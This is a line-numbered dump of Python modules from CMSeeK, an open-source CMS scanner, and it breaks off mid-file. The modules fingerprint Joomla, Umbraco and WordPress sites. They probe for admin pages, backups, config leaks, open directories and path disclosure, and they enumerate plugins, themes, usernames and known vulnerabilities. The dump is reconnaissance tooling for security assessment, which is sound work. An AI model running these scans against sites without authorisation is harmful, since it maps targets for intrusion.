56 | cmseek.statement('Checking if user registration is enabled') | |
57 | registration = user_registration.start(url,ua) | |
58 | ||
59 | # Find admin url | |
60 | cmseek.info('Locating admin url') | |
61 | admin = admin_finder.start(url,ua) | |
62 | ||
63 | # Backups check | |
64 | cmseek.info('Checking for common Backups') | |
65 | backups = backup_finder.start(url,ua) | |
66 | ||
67 | # Check Potential configuration file leak | |
68 | cmseek.info('Looking for potential config leak') | |
69 | configs = config_check.start(url,ua) | |
70 | ||
71 | # Checking for directory listing | |
72 | cmseek.statement('Checking for directory listing') | |
73 | directories = dir_list.start(url, ua) | |
74 | ||
75 | ### THE RESULTS START FROM HERE | |
76 | ||
77 | cmseek.clearscreen() | |
78 | cmseek.banner("Deep Scan Results") | |
79 | cmseek.result('Target: ',url) | |
80 | cmseek.result("Detected CMS: ", 'Joomla') | |
81 | cmseek.update_log('cms_name','joomla') # update log | |
82 | cmseek.result("CMS URL: ", "https://joomla.org") | |
83 | cmseek.update_log('cms_url', "https://joomla.org") # update log | |
84 | ||
85 | if version != '0': | |
86 | cmseek.result("Joomla Version: ", version) | |
87 | cmseek.update_log('joomla_version', version) | |
88 | ||
89 | if registration[0] == '1': | |
90 | cmseek.result('User registration enabled: ', registration[1]) | |
91 | cmseek.update_log('user_registration_url', registration[1]) | |
92 | ||
93 | if debug_mode =='1': | |
94 | cmseek.result('Debug mode enabled', '') | |
95 | cmseek.update_log('joomla_debug_mode', 'enabled') | |
96 | else: | |
97 | cmseek.update_log('joomla_debug_mode', 'disabled') | |
98 | ||
99 | if readmefile == '1': | |
100 | cmseek.result('Readme file: ', url + '/README.txt') | |
101 | cmseek.update_log('joomla_readme_file', url + '/README.txt') | |
102 | ||
103 | if admin[0] > 0: | |
104 | cmseek.result('Admin URL: ', url + admin[1][0]) | |
105 | admin_log = '' | |
106 | for adm in admin[1]: | |
107 | admin_log += url + '/' + adm + ',' | |
108 | # print(cmseek.bold + cmseek.fgreen + " [B] " + cmseek.cln + url + '/' + adm) | |
109 | cmseek.update_log('joomla_backup_files', admin_log) | |
110 | print('\n') | |
111 | ||
112 | if directories[0] > 0: | |
113 | cmseek.result('Open directories: ', str(directories[0])) | |
114 | cmseek.success('Open directory url: ') | |
115 | dirs = '' | |
116 | for dir in directories[1]: | |
117 | dirs += url + '/' + dir + ',' | |
118 | print(cmseek.bold + cmseek.fgreen + " [>] " + cmseek.cln + url + dir) | |
119 | cmseek.update_log('directory_listing', dirs) | |
120 | print('\n') | |
121 | ||
122 | if backups[0] > 0: | |
123 | cmseek.result('Found potential backup file: ', str(backups[0])) | |
124 | cmseek.success('Backup URLs: ') | |
125 | bkup_log = [] | |
126 | for backup in backups[1]: | |
127 | bkup_log.append(url + '/' + backup) | |
128 | print(cmseek.bold + cmseek.fgreen + " [B] " + cmseek.cln + url + '/' + backup) | |
129 | cmseek.update_log('joomla_backup_files', bkup_log, False) | |
130 | print('\n') | |
131 | ||
132 | if configs[0] > 0: | |
133 | cmseek.result('Found potential Config file: ', str(configs[0])) | |
134 | cmseek.success('Config URLs: ') | |
135 | conf_log = '' | |
136 | for config in configs[1]: | |
137 | conf_log += url + '/' + config + ',' | |
138 | print(cmseek.bold + cmseek.fgreen + " [c] " + cmseek.cln + url + '/' + config) | |
139 | cmseek.update_log('joomla_config_files', conf_log) | |
140 | print('\n') | |
141 | ||
142 | if vuln_detection == '1' and vuln_count > 0: | |
143 | cmseek.result('Total joomla core vulnerabilities: ', str(vuln_count)) | |
144 | cmseek.update_log("vulnerabilities_count", vuln_count) | |
145 | joomla_vulns_to_log = [] | |
146 | cmseek.info('Vulnerabilities found: \n') | |
147 | for vuln in joom_vulns: | |
148 | # prepare the vuln details to be added to the log | |
149 | _vulnName = vuln.split('\\n')[0] | |
150 | _vulnRefs = [] | |
151 | # TODO: try not to use a for loop here. | |
152 | for _index, _vr in enumerate(vuln.split('\\n')): | |
153 | if _index != 0: | |
154 | _vulnRefs.append(_vr) | |
155 | ||
156 | joomla_vulns_to_log.append({"name": _vulnName, "references": _vulnRefs}) | |
157 | vuln = vuln.replace('\\n', cmseek.cln + '\n ') | |
158 | print(cmseek.bold + cmseek.red + '[v] ' + vuln) | |
159 | print('\n') | |
160 | cmseek.update_log("vulnerabilities", joomla_vulns_to_log, False) | |
161 | elif vuln_detection == '2': | |
162 | cmseek.update_log("vulnerabilities_count", 0) | |
163 | cmseek.warning('Couldn\'t find core vulnerabilities, No VERSION detected') | |
164 | elif vuln_detection == '3': | |
165 | cmseek.update_log("vulnerabilities_count", 0) | |
166 | cmseek.error('Core vulnerability database not found!') | |
167 | else: | |
168 | cmseek.update_log("vulnerabilities_count", 0) | |
169 | cmseek.warning('No core vulnerabilities detected!') |
0 | #!/usr/bin/python3 | |
1 | # -*- coding: utf-8 -*- | |
2 | # This is a part of CMSeeK, check the LICENSE file for more information | |
3 | # Copyright (c) 2018 - 2020 Tuhinshubhra | |
4 | ||
5 | # This is mostly for falsepositive detection | |
6 | ||
7 | import cmseekdb.basic as cmseek ## Good old module | |
8 | import VersionDetect.umbraco as umbraco_version_detect | |
9 | import cmseekdb.result as sresult | |
10 | import time | |
11 | import os | |
12 | import re | |
13 | ||
14 | def falsepositive(): | |
15 | cmseek.error('Detection was false positive! CMSeeK is quitting!') | |
16 | cmseek.success('Run CMSeeK with {0}{1}{2} argument next time'.format(cmseek.fgreen, '--ignore-cms umbraco', cmseek.cln)) | |
17 | #cmseek.handle_quit() | |
18 | return | |
19 | ||
20 | def start(id, url, ua, ga, source, detection_method, headers): | |
21 | if id == 'umbraco': | |
22 | cms_version = 0 | |
23 | cmseek.statement('Starting Umbraco DeepScan') | |
24 | if detection_method == 'source': | |
25 | # detect if it's false positive | |
26 | umbraco_url = url + '/umbraco' | |
27 | test_src = cmseek.getsource(umbraco_url, ua) | |
28 | ||
29 | if test_src[0] == '1': | |
30 | # okay we got the source let's test it | |
31 | if 'var Umbraco' in test_src[1]: | |
32 | # Umbraco Detected! | |
33 | # Let's get version | |
34 | cms_version = umbraco_version_detect.start(headers, url, ua, test_src[1]) | |
35 | else: | |
36 | falsepositive() | |
37 | else: | |
38 | falsepositive() | |
39 | else: | |
40 | # detection method was different so we are good and no need to check for false positive i guess | |
41 | cms_version = umbraco_version_detect.start(headers, url, ua) | |
42 | ||
43 | cmseek.clearscreen() | |
44 | cmseek.banner("CMS Scan Results") | |
45 | sresult.target(url) | |
46 | sresult.cms('Umbraco',cms_version,'https://umbraco.com') | |
47 | cmseek.update_log('cms_name', 'Umbraco') # update log | |
48 | if cms_version != '0' and cms_version != None: | |
49 | cmseek.update_log('cms_version', cms_version) # update log | |
50 | cmseek.update_log('cms_url', 'https://umbraco.com') # update log | |
51 | comptime = round(time.time() - cmseek.cstart, 2) | |
52 | log_file = os.path.join(cmseek.log_dir, 'cms.json') | |
53 | sresult.end(str(cmseek.total_requests), str(comptime), log_file) | |
54 | return |
0 | #!/usr/bin/python3 | |
1 | # -*- coding: utf-8 -*- | |
2 | # This is a part of CMSeeK, check the LICENSE file for more information | |
3 | # Copyright (c) 2018 - 2020 Tuhinshubhra | |
4 | ||
5 | # http://localhost/wordpress/wordpress/wp-login.php?action=register | |
6 | ||
7 | import cmseekdb.basic as cmseek | |
8 | ||
9 | def start(url,ua): | |
10 | reg_url = url + '/wp-login.php?action=register' | |
11 | cmseek.info('Checking user registration status') | |
12 | reg_source = cmseek.getsource(reg_url, ua) | |
13 | reg_status = '0' | |
14 | if reg_source[0] == '1' and '<form' in reg_source[1]: | |
15 | if 'Registration confirmation will be emailed to you' in reg_source[1] or 'value="Register"' in reg_source[1] or 'id="user_email"' in reg_source[1]: | |
16 | cmseek.success('User registration open: ' + cmseek.bold + cmseek.fgreen + reg_url + cmseek.cln) | |
17 | reg_status = '1' | |
18 | return [reg_status, reg_url] |
0 | #!/usr/bin/python3 | |
1 | # -*- coding: utf-8 -*- | |
2 | # This is a part of CMSeeK, check the LICENSE file for more information | |
3 | # Copyright (c) 2018 - 2020 Tuhinshubhra | |
4 | ||
5 | # why tf is this empty tho? |
0 | #!/usr/bin/python3 | |
1 | # -*- coding: utf-8 -*- | |
2 | # This is a part of CMSeeK, check the LICENSE file for more information | |
3 | # Copyright (c) 2018 - 2020 Tuhinshubhra | |
4 | ||
5 | ### All WordPress DeepScan stuffs goes here | |
6 | ||
7 | import cmseekdb.basic as cmseek ## Good old module | |
8 | import VersionDetect.wp as wordpress_version_detect | |
9 | import deepscans.wp.userenum as wp_user_enum | |
10 | import deepscans.wp.vuln as wp_vuln_scan | |
11 | import deepscans.wp.pluginsdetect as wp_plugins_enum | |
12 | import deepscans.wp.themedetect as wp_theme_enum | |
13 | import deepscans.wp.pathdisc as path_disclosure | |
14 | import deepscans.wp.check_reg as check_reg | |
15 | import cmseekdb.result as sresult | |
16 | import time | |
17 | import re | |
18 | import os | |
19 | ||
20 | def start(id, url, ua, ga, source, detection_method): | |
21 | ''' | |
22 | id = ID of the cms | |
23 | url = URL of target | |
24 | ua = User Agent | |
25 | ga = [0/1] is GENERATOR meta tag available | |
26 | source = source code | |
27 | ''' | |
28 | ||
29 | ## Do shits later [update from later: i forgot what shit i had to do ;___;] | |
30 | if id == "wp": | |
31 | # referenced before assignment fix | |
32 | vulnss = version = wpvdbres = result = plugins_found = usernames = usernamesgen = '0' | |
33 | ||
34 | cmseek.statement('Starting WordPress DeepScan') | |
35 | ||
36 | ||
37 | # Check if site really is WordPress | |
38 | if detection_method == 'source': | |
39 | # well most of the wordpress false positives are from source detections. | |
40 | cmseek.statement('Checking if the detection is false positive') | |
41 | temp_domain = re.findall('^(?:https?:\/\/)?(?:[^@\n]+@)?(?:www\.)?([^:\/\n\?\=]+)', url)[0] | |
42 | wp_match_pattern = temp_domain + '\/wp-(content|include|admin)\/' | |
43 | if not re.search(wp_match_pattern, source): | |
44 | cmseek.error('Detection was false positive! CMSeeK is quitting!') | |
45 | cmseek.success('Run CMSeeK with {0}{1}{2} argument next time'.format(cmseek.fgreen, '--ignore-cms wp', cmseek.cln)) | |
46 | #cmseek.handle_quit() | |
47 | return | |
48 | ||
49 | # Version detection | |
50 | version = wordpress_version_detect.start(id, url, ua, ga, source) | |
51 | ||
52 | ## Check for minor stuffs like licesnse readme and some open directory checks | |
53 | cmseek.statement("Initiating open directory and files check") | |
54 | ||
55 | ## Readme.html | |
56 | readmesrc = cmseek.getsource(url + '/readme.html', ua) | |
57 | if readmesrc[0] != '1': ## something went wrong while getting the source codes | |
58 | cmseek.statement("Couldn't get readme file's source code most likely it's not present") | |
59 | readmefile = '0' # Error Getting Readme file | |
60 | elif 'Welcome. WordPress is a very special project to me.' in readmesrc[1]: | |
61 | readmefile = '1' # Readme file present | |
62 | else: | |
63 | readmefile = '2' # Readme file found but most likely it's not of wordpress | |
64 | ||
65 | ## license.txt | |
66 | licsrc = cmseek.getsource(url + '/license.txt', ua) | |
67 | if licsrc[0] != '1': | |
68 | cmseek.statement('license file not found') | |
69 | licfile = '0' | |
70 | elif 'WordPress - Web publishing software' in licsrc[1]: | |
71 | licfile = '1' | |
72 | else: | |
73 | licfile = '2' | |
74 | ||
75 | ## wp-content/uploads/ folder | |
76 | wpupsrc = cmseek.getsource(url + '/wp-content/uploads/', ua) | |
77 | if wpupsrc[0] != '1': | |
78 | wpupdir = '0' | |
79 | elif 'Index of /wp-content/uploads' in wpupsrc[1]: | |
80 | wpupdir = '1' | |
81 | else: | |
82 | wpupdir = '2' | |
83 | ||
84 | ## xmlrpc | |
85 | xmlrpcsrc = cmseek.getsource(url + '/xmlrpc.php', ua) | |
86 | if xmlrpcsrc[0] != '1': | |
87 | cmseek.statement('XML-RPC interface not available') | |
88 | xmlrpc = '0' | |
89 | elif 'XML-RPC server accepts POST requests only.' in xmlrpcsrc[1]: | |
90 | xmlrpc = '1' | |
91 | else: | |
92 | xmlrpc = '2' | |
93 | ||
94 | ## Path disclosure | |
95 | cmseek.statement('Looking for potential path disclosure') | |
96 | path = path_disclosure.start(url, ua) | |
97 | if path != "": | |
98 | cmseek.success('Path disclosure detected, path: ' + cmseek.bold + path + cmseek.cln) | |
99 | ||
100 | ## Check for user registration | |
101 | usereg = check_reg.start(url,ua) | |
102 | reg_found = usereg[0] | |
103 | reg_url = usereg[1] | |
104 | ||
105 | ## Plugins Enumeration | |
106 | plug_enum = wp_plugins_enum.start(source) | |
107 | plugins_found = plug_enum[0] | |
108 | plugins = plug_enum[1] | |
109 | ||
110 | ## Themes Enumeration | |
111 | theme_enum = wp_theme_enum.start(source,url,ua) | |
112 | themes_found = theme_enum[0] | |
113 | themes = theme_enum[1] | |
114 | ||
115 | ## User enumeration | |
116 | uenum = wp_user_enum.start(id, url, ua, ga, source) | |
117 | usernamesgen = uenum[0] | |
118 | usernames = uenum[1] | |
119 | ||
120 | ## Version Vulnerability Detection | |
121 | if version != '0': | |
122 | version_vuln = wp_vuln_scan.start(version, ua) | |
123 | wpvdbres = version_vuln[0] | |
124 | result = version_vuln[1] | |
125 | if wpvdbres != '0' and version != '0': | |
126 | vulnss = len(result['vulnerabilities']) | |
127 | vfc = version_vuln[2] | |
128 | ||
129 | ### Deep Scan Results comes here | |
130 | comptime = round(time.time() - cmseek.cstart, 2) | |
131 | log_file = os.path.join(cmseek.log_dir, 'cms.json') | |
132 | cmseek.clearscreen() | |
133 | cmseek.banner("Deep Scan Results") | |
134 | sresult.target(url) | |
135 | sresult.cms('WordPress', version, 'https://wordpress.org') | |
136 | #cmseek.result("Detected CMS: ", 'WordPress') | |
137 | cmseek.update_log('cms_name','WordPress') # update log | |
138 | #cmseek.result("CMS URL: ", "https://wordpress.org") | |
139 | cmseek.update_log('cms_url', "https://wordpress.org") # update log | |
140 | ||
141 | sresult.menu('[WordPress Deepscan]') | |
142 | item_initiated = False | |
143 | item_ended = False | |
144 | ||
145 | ||
146 | if readmefile == '1': | |
147 | sresult.init_item("Readme file found: " + cmseek.fgreen + url + '/readme.html' + cmseek.cln) | |
148 | cmseek.update_log('wp_readme_file',url + '/readme.html') | |
149 | item_initiated = True | |
150 | ||
151 | ||
152 | if licfile == '1': | |
153 | cmseek.update_log('wp_license', url + '/license.txt') | |
154 | if item_initiated == False: | |
155 | sresult.init_item("License file: " + cmseek.fgreen + url + '/license.txt' + cmseek.cln) | |
156 | else: | |
157 | sresult.item("License file: " + cmseek.fgreen + url + '/license.txt' + cmseek.cln) | |
158 | ||
159 | if wpvdbres == '1': | |
160 | if item_initiated == False: | |
161 | sresult.init_item('Changelog: ' + cmseek.fgreen + str(result['changelog_url']) + cmseek.cln) | |
162 | else: | |
163 | sresult.item('Changelog: ' + cmseek.fgreen + str(result['changelog_url']) + cmseek.cln) | |
164 | cmseek.update_log('wp_changelog_file',str(result['changelog_url'])) | |
165 | ||
166 | if wpupdir == '1': | |
167 | cmseek.update_log('wp_uploads_directory',url + '/wp-content/uploads') | |
168 | if item_initiated == False: | |
169 | sresult.init_item("Uploads directory has listing enabled: " + cmseek.fgreen + url + '/wp-content/uploads' + cmseek.cln) | |
170 | else: | |
171 | sresult.item("Uploads directory has listing enabled: " + cmseek.fgreen + url + '/wp-content/uploads' + cmseek.cln) | |
172 | ||
173 | ||
174 | if xmlrpc == '1': | |
175 | cmseek.update_log('xmlrpc', url + '/xmlrpc.php') | |
176 | if item_initiated == False: | |
177 | sresult.init_item("XML-RPC interface: "+ cmseek.fgreen + url + '/xmlrpc.php' + cmseek.cln) | |
178 | else: | |
179 | sresult.item("XML-RPC interface: " + cmseek.fgreen + url + '/xmlrpc.php' + cmseek.cln) | |
180 | ||
181 | ||
182 | if reg_found == '1': | |
183 | sresult.item('User registration enabled: ' + cmseek.bold + cmseek.fgreen + reg_url + cmseek.cln) | |
184 | cmseek.update_log('user_registration', reg_url) | |
185 | ||
186 | ||
187 | if path != "": | |
188 | sresult.item('Path disclosure: ' + cmseek.bold + cmseek.orange + path + cmseek.cln) | |
189 | cmseek.update_log('path', path) | |
190 | ||
191 | ||
192 | if plugins_found != 0: | |
193 | plugs_count = len(plugins) | |
194 | sresult.init_item("Plugins Enumerated: " + cmseek.bold + cmseek.fgreen + str(plugs_count) + cmseek.cln) | |
195 | wpplugs = "" | |
196 | for i, plugin in enumerate(plugins): | |
197 | plug = plugin.split(':') | |
198 | wpplugs = wpplugs + plug[0] + ' Version ' + plug[1] + ',' | |
199 | if i == 0 and i != plugs_count - 1: | |
200 | sresult.init_sub('Plugin: ' + cmseek.bold + cmseek.fgreen + plug[0] + cmseek.cln) | |
201 | sresult.init_subsub('Version: ' + cmseek.bold + cmseek.fgreen + plug[1] + cmseek.cln) | |
202 | sresult.end_subsub('URL: ' + cmseek.fgreen + url + '/wp-content/plugins/' + plug[0] + cmseek.cln) | |
203 | elif i == plugs_count - 1: | |
204 | sresult.empty_sub() | |
205 | sresult.end_sub('Plugin: ' + cmseek.bold + cmseek.fgreen + plug[0] + cmseek.cln) | |
206 | sresult.init_subsub('Version: ' + cmseek.bold + cmseek.fgreen + plug[1] + cmseek.cln, True, False) | |
207 | sresult.end_subsub('URL: ' + cmseek.fgreen + url + '/wp-content/plugins/' + plug[0] + cmseek.cln, True, False) | |
208 | else: | |
209 | sresult.empty_sub() | |
210 | sresult.sub_item('Plugin: ' + cmseek.bold + cmseek.fgreen + plug[0] + cmseek.cln) | |
211 | sresult.init_subsub('Version: ' + cmseek.bold + cmseek.fgreen + plug[1] + cmseek.cln) | |
212 | sresult.end_subsub('URL: ' + cmseek.fgreen + url + '/wp-content/plugins/' + plug[0] + cmseek.cln) | |
213 | cmseek.update_log('wp_plugins', wpplugs) | |
214 | sresult.empty_item() | |
215 | ||
216 | if themes_found != 0: | |
217 | thms_count = len(themes) | |
218 | sresult.init_item("Themes Enumerated: " + cmseek.bold + cmseek.fgreen + str(thms_count) + cmseek.cln) | |
219 | wpthms = "" | |
220 | for i,theme in enumerate(themes): | |
221 | thm = theme.split(':') | |
222 | thmz = thm[1].split('|') | |
223 | wpthms = wpthms + thm[0] + ' Version ' + thmz[0] + ',' | |
224 | if i == 0 and i != thms_count - 1: | |
225 | sresult.init_sub('Theme: ' + cmseek.bold + cmseek.fgreen + thm[0] + cmseek.cln) | |
226 | sresult.init_subsub('Version: ' + cmseek.bold + cmseek.fgreen + thmz[0] + cmseek.cln) | |
227 | if thmz[1] != '': | |
228 | sresult.subsub('Theme Zip: ' + cmseek.bold + cmseek.fgreen + url + thmz[1] + cmseek.cln) | |
229 | sresult.end_subsub('URL: ' + cmseek.fgreen + url + '/wp-content/themes/' + thm[0] + cmseek.cln) | |
230 | elif i == thms_count - 1: | |
231 | sresult.empty_sub(True) | |
232 | sresult.end_sub('Theme: ' + cmseek.bold + cmseek.fgreen + thm[0] + cmseek.cln) | |
233 | sresult.init_subsub('Version: ' + cmseek.bold + cmseek.fgreen + thmz[0] + cmseek.cln, True, False) | |
234 | if thmz[1] != '': | |
235 | sresult.subsub('Theme Zip: ' + cmseek.bold + cmseek.fgreen + url + thmz[1] + cmseek.cln, True, False) | |
236 | sresult.end_subsub('URL: ' + cmseek.fgreen + url + '/wp-content/themes/' + thm[0] + cmseek.cln, True, False) | |
237 | else: | |
238 | sresult.sub_item('Theme: ' + cmseek.bold + cmseek.fgreen + thm[0] + cmseek.cln) | |
239 | sresult.init_subsub('Version: ' + cmseek.bold + cmseek.fgreen + thmz[0] + cmseek.cln) | |
240 | if thmz[1] != '': | |
241 | sresult.subsub('Theme Zip: ' + cmseek.bold + cmseek.fgreen + url + thmz[1] + cmseek.cln) | |
242 | sresult.end_subsub('URL: ' + cmseek.fgreen + url + '/wp-content/themes/' + thm[0] + cmseek.cln) | |
243 | cmseek.update_log('wp_themes', wpthms) | |
244 | sresult.empty_item() | |
245 | ||
246 | ||
247 | if usernamesgen == '1': | |
248 | user_count = len(usernames) | |
249 | sresult.init_item("Usernames harvested: " + cmseek.bold + cmseek.fgreen + str(user_count) + cmseek.cln) | |
250 | wpunames = "" | |
251 | for i,u in enumerate(usernames): | |
252 | wpunames = wpunames + u + "," | |
253 | if i == 0 and i != user_count - 1: | |
254 | sresult.init_sub(cmseek.bold + cmseek.fgreen + u + cmseek.cln) | |
255 | elif i == user_count - 1: | |
256 | sresult.end_sub(cmseek.bold + cmseek.fgreen + u + cmseek.cln) | |
257 | else: | |
258 | sresult.sub_item(cmseek.bold + cmseek.fgreen + u + cmseek.cln) | |
259 | cmseek.update_log('wp_users', wpunames) | |
260 | sresult.empty_item() | |
261 | ||
262 | if version != '0': | |
263 | # cmseek.result("Version: ", version) | |
264 | cmseek.update_log('wp_version', version) | |
265 | if wpvdbres == '1': | |
266 | sresult.end_item('Version vulnerabilities: ' + cmseek.bold + cmseek.fgreen + str(vulnss) + cmseek.cln) | |
267 | cmseek.update_log('wp_vuln_count', str(vulnss)) | |
268 | cmseek.update_log("wp_vulns", result, False) | |
269 | if vulnss > 0: | |
270 | for i,vuln in enumerate(result['vulnerabilities']): | |
271 | if i == 0 and i != vulnss - 1: | |
272 | sresult.empty_sub(False) | |
273 | sresult.init_sub(cmseek.bold + cmseek.fgreen + str(vuln['name']) + cmseek.cln, False) | |
274 | # sresult.init_subsub("Type: " + cmseek.bold + cmseek.fgreen + str(vuln['vuln_type']) + cmseek.cln, False, True) | |
275 | # sresult.subsub("Link: " + cmseek.bold + cmseek.fgreen + "http://wpvulndb.com/vulnerabilities/" + str(vuln['id']) + cmseek.cln, False, True) | |
276 | strvuln = str(vuln) | |
277 | if vuln['cve'] != "": | |
278 | sresult.subsub("CVE: " + cmseek.fgreen + "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-" + vuln["cve"] + cmseek.cln, False, True) | |
279 | ||
280 | ''' | |
281 | if 'exploitdb' in strvuln: | |
282 | for ref in vuln['references']['exploitdb']: | |
283 | sresult.subsub("ExploitDB Link: " + cmseek.fgreen + "http://www.exploit-db.com/exploits/" + str(ref) + cmseek.cln, False, True) | |
284 | ||
285 | if 'metasploit' in strvuln: | |
286 | for ref in vuln['references']['metasploit']: | |
287 | sresult.subsub("Metasploit Module: " + cmseek.fgreen + "http://www.metasploit.com/modules/" + str(ref) + cmseek.cln, False, True) | |
288 | ||
289 | if 'osvdb' in strvuln: | |
290 | for ref in vuln['references']['osvdb']: | |
291 | sresult.subsub("OSVDB Link: " + cmseek.fgreen + "http://osvdb.org/" + str(ref) + cmseek.cln, False, True) | |
292 | ||
293 | if 'secunia' in strvuln: | |
294 | for ref in vuln['references']['secunia']: | |
295 | sresult.subsub("Secunia Advisory: " + cmseek.fgreen + "http://secunia.com/advisories/" + str(ref) + cmseek.cln, False, True) | |
296 | ||
297 | if 'url' in strvuln: | |
298 | for ref in vuln['references']['url']: | |
299 | sresult.subsub("Reference: " + cmseek.fgreen + str(ref) + cmseek.cln, False, True) | |
300 | ''' | |
301 | if vuln["references"] != []: | |
302 | for ref in vuln["references"]: | |
303 | sresult.subsub("Reference: " + cmseek.fgreen + str(ref) + cmseek.cln, False, True) | |
304 | sresult.end_subsub("Fixed In Version: " + cmseek.bold + cmseek.fgreen + str(vuln['fixed_in']) + cmseek.cln, False, True) | |
305 | ||
306 | elif i == vulnss - 1: | |
307 | sresult.empty_sub(False) | |
308 | sresult.end_sub(cmseek.bold + cmseek.fgreen + str(vuln['name']) + cmseek.cln, False) | |
309 | # sresult.init_subsub("Type: " + cmseek.bold + cmseek.fgreen + str(vuln['vuln_type']) + cmseek.cln, False, False) | |
310 | # sresult.subsub("Link: " + cmseek.bold + cmseek.fgreen + "http://wpvulndb.com/vulnerabilities/" + str(vuln['id']) + cmseek.cln, False, False) | |
311 | strvuln = str(vuln) | |
312 | if vuln['cve'] != "": | |
313 | sresult.subsub("CVE: " + cmseek.fgreen + "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-" + vuln["cve"] + cmseek.cln, False, False) | |
314 | ||
315 | if vuln["references"] != []: | |
316 | for ref in vuln["references"]: | |
317 | sresult.subsub("Reference: " + cmseek.fgreen + str(ref) + cmseek.cln, False, False) | |
318 | ||
319 | sresult.end_subsub("Fixed In Version: " + cmseek.bold + cmseek.fgreen + str(vuln['fixed_in']) + cmseek.cln, False, False) | |
320 | else: | |
321 | sresult.empty_sub(False) | |
322 | sresult.sub_item(cmseek.bold + cmseek.fgreen + str(vuln['name']) + cmseek.cln, False) | |
323 | #sresult.init_subsub("Type: " + cmseek.bold + cmseek.fgreen + str(vuln['vuln_type']) + cmseek.cln, False, True) | |
324 | #sresult.subsub("Link: " + cmseek.bold + cmseek.fgreen + "http://wpvulndb.com/vulnerabilities/" + str(vuln['id']) + cmseek.cln, False, True) | |
325 | strvuln = str(vuln) | |
326 | if vuln['cve'] != "": | |
327 | sresult.subsub("CVE: " + cmseek.fgreen + "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-" + str(ref) + cmseek.cln, False, True) | |
328 | ||
329 | ||
330 | if vuln["references"] != []: | |
331 | for ref in vuln["references"]: | |
332 | sresult.subsub("Reference: " + cmseek.fgreen + str(ref) + cmseek.cln, False, True) | |
333 | ||
334 | sresult.end_subsub("Fixed In Version: " + cmseek.bold + cmseek.fgreen + str(vuln['fixed_in']) + cmseek.cln, False, True) | |
335 | sresult.end(str(cmseek.total_requests), str(comptime), log_file) | |
336 | return | |
337 | ||
338 | ||
339 | return |
0 | #!/usr/bin/python3 | |
1 | # -*- coding: utf-8 -*- | |
2 | # This is a part of CMSeeK, check the LICENSE file for more information | |
3 | # Copyright (c) 2018 - 2020 Tuhinshubhra | |
4 | ||
5 | import cmseekdb.basic as cmseek | |
6 | import re | |
7 | ||
8 | def start(url,ua): | |
9 | ||
10 | rss_file = url + '/wp-includes/rss.php' | |
11 | rss_source = cmseek.getsource(rss_file, ua) | |
12 | if rss_source[0] == '1' and 'on line' in rss_source[1]: | |
13 | path = re.findall(r'<b>/(.*?)wp-includes/rss.php</b>', rss_source[1]) | |
14 | if path != []: | |
15 | return path[0] | |
16 | ||
17 | tw_theme = url + '/wp-content/themes/twentyfifteen/index.php' | |
18 | theme_source = cmseek.getsource(tw_theme, ua) | |
19 | if theme_source[0] == '1' and 'Uncaught Error:' in theme_source[1]: | |
20 | path = re.findall(r'<b>(.*?)wp-content/themes/twentyfifteen/index.php</b>', theme_source[1]) | |
21 | if path != []: | |
22 | return path[0] | |
23 | ||
24 | tw_theme = url + '/wp-content/themes/twentysixteen/index.php' | |
25 | theme_source = cmseek.getsource(tw_theme, ua) | |
26 | if theme_source[0] == '1' and 'Uncaught Error:' in theme_source[1]: | |
27 | path = re.findall(r'<b>(.*?)wp-content/themes/twentyfifteen/index.php</b>', theme_source[1]) | |
28 | if path != []: | |
29 | return path[0] | |
30 | ||
31 | tw_theme = url + '/wp-content/themes/twentyseventeen/index.php' | |
32 | theme_source = cmseek.getsource(tw_theme, ua) | |
33 | if theme_source[0] == '1' and 'Uncaught Error:' in theme_source[1]: | |
34 | path = re.findall(r'<b>(.*?)wp-content/themes/twentyfifteen/index.php</b>', theme_source[1]) | |
35 | if path != []: | |
36 | return path[0] | |
37 | ||
38 | return "" |
0 | #!/usr/bin/python3 | |
1 | # -*- coding: utf-8 -*- | |
2 | # This is a part of CMSeeK, check the LICENSE file for more information | |
3 | # Copyright (c) 2018 - 2020 Tuhinshubhra | |
4 | ||
5 | import cmseekdb.basic as cmseek | |
6 | import re | |
7 | import json | |
8 | ||
9 | def start(source): | |
10 | cmseek.info('Starting passive plugin enumeration') | |
11 | plug_regex = re.compile('wp-content/plugins/([^/]+)/.+ver=([0-9\.]+)') | |
12 | results = plug_regex.findall(source) | |
13 | plugins = [] | |
14 | found = 0 | |
15 | for result in results: | |
16 | # found += 1 | |
17 | name = result[0].replace('-master','').replace('.min','') | |
18 | nc = name + ":" | |
19 | if nc not in str(plugins): | |
20 | version = result[1] | |
21 | each_plugin = name + ":" + version | |
22 | plugins.append(each_plugin) | |
23 | plugins = set(plugins) | |
24 | found = len(plugins) | |
25 | if found > 0: | |
26 | if found == 1: | |
27 | cmseek.success(cmseek.bold + cmseek.fgreen + str(found) + " Plugin enumerated!") | |
28 | else: | |
29 | cmseek.success(cmseek.bold + cmseek.fgreen + str(found) + " Plugins enumerated!") | |
30 | else: | |
31 | cmseek.error('No plugins enumerated!') | |
32 | return [found, plugins] |
0 | #!/usr/bin/python3 | |
1 | # -*- coding: utf-8 -*- | |
2 | # This is a part of CMSeeK, check the LICENSE file for more information | |
3 | # Copyright (c) 2018 - 2020 Tuhinshubhra | |
4 | ||
5 | import cmseekdb.basic as cmseek | |
6 | import re | |
7 | ||
8 | def start(source,url,ua): | |
9 | cmseek.info('Starting passive theme enumeration') | |
10 | ## plug_file = open('database/themes.json', 'r') | |
11 | ## plug_data = plug_file.read() | |
12 | ## plug_json = json.loads(plug_data) | |
13 | plug_regex = re.compile('wp-content/themes/([^/]+)/.+ver=([0-9\.]+)') | |
14 | results = plug_regex.findall(source) | |
15 | themes = [] | |
16 | found = 0 | |
17 | for result in results: | |
18 | # found += 1 | |
19 | name = result[0].replace('-master','').replace('.min','') | |
20 | nc = name + ":" | |
21 | if nc not in str(themes): | |
22 | version = result[1] | |
23 | each_theme = name + ":" + version + "|" | |
24 | # look if theme zip available | |
25 | cmseek.statement('Looking for theme zip file!') | |
26 | theme_zip = url + '/wp-content/themes/' + name + '.zip' | |
27 | zip_status = cmseek.check_url(theme_zip, ua) | |
28 | if zip_status == '1': | |
29 | cmseek.success('Current theme can be downloaded, URL: ' + cmseek.bold + theme_zip + cmseek.cln) | |
30 | each_theme += '/wp-content/themes/' + name + '.zip' | |
31 | themes.append(each_theme) | |
32 | themes = set(themes) | |
33 | found = len(themes) | |
34 | if found > 0: | |
35 | if found == 1: | |
36 | cmseek.success(cmseek.bold + cmseek.fgreen + str(found) + " theme detected!") | |
